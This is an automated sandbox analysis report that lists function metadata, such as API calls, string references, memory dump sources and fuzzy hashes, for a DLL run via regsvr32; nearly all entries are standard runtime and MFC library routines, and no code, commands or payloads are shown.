Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(040A1620), ref: 100330C1

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1004370E
_Fputc.LIBCPMT ref: 10043762
_Fputc.LIBCPMT ref: 10043890

Strings

, xrefs: 1004381A

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

KERNEL32, xrefs: 1003B6EA
IsProcessorFeaturePresent, xrefs: 1003B6F9

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10043377
_fgetc.LIBCMT ref: 100434AD

Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3

_memcpy_s.LIBCMT ref: 10043472
_ungetc.LIBCMT ref: 100434F8

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 77memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,10003158), ref: 100033CE
GetProcessHeap.KERNEL32(00000000,00000000,?,?,10003158), ref: 100033DA
HeapFree.KERNEL32(00000000,?,?,10003158), ref: 100033E1

Strings

Oxt, xrefs: 100033DA

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual
String ID: Oxt
API String ID: 190046822-1245641732
Opcode ID: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction ID: 2d2bd09531cc21cd0688133637c85df5768d7ec480326e7220fdcfa052c0fbce
Opcode Fuzzy Hash: 4476d00a63b036dd075107593c39d6170d91511c8e44fc724c93cdb70bf08c87
Instruction Fuzzy Hash: 2F317474A00208EFDB05DF94C685B9EB7B6FB48344F24C298E9055B395CB75AF41DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__strdup
String ID:
API String ID: 4206445780-0
Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44

Uniqueness

Uniqueness Score: -1.00%

Function 10029178, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 100291A4
SendMessageA.USER32 ref: 100291CF
GetCapture.USER32 ref: 100291E1
SendMessageA.USER32 ref: 100291F0

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620

Uniqueness

Uniqueness Score: -1.00%

Function 1003B5D6, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1003B5FC

Part of subcall function 1003B421: __fltout2.LIBCMT ref: 1003B44D

__cftog_l.LIBCMT ref: 1003B622
__cftoe_l.LIBCMT ref: 1003B654

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1002A257, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4

Uniqueness

Uniqueness Score: -1.00%

Function 10001310, Relevance: 6.0, APIs: 4, Instructions: 41networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1000132B
inet_addr.WS2_32(?), ref: 10001340
htons.WS2_32(?), ref: 1000134E
sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 1000136F

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023584, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000001), ref: 100235A4
GetActiveWindow.USER32 ref: 100235AF
SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235BD
FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,057BE668), ref: 100235D9

Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421718226.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.421730767.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421737622.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.421767005.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421773955.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.421780577.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65

Uniqueness

Uniqueness Score: -1.00%

Function 1002173A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
PathFindExtensionA.SHLWAPI(?), ref: 10021778

Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669

Strings

%s%s.dll, xrefs: 10021781

Memory Dump Source

Source File: 00000003.00000002.421661610.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421651971.0000000010000000.00000002.00020000.sdmp Download File
